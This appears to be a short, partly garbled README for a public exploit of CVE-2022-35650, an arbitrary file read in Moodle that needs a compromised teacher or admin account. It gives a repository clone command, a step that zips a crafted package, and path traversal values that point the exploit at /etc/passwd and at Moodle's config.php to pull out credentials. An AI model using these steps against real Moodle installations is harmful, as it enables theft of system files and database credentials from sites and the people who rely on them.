
Exploit for CVE-2022-35650, a Moodle Arbitrary File Read.
This is an arbitrary file read in Moodle.
You must have compromised a teacher or admin level user.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) is downloaded/etc/passwdIf you want to read the config file (with juicy creds), set your baseurl in imsmanifest.xml to this:
../../../../../../../../../../../var/www/html
and your img src in pool.dat to:
muc/config.php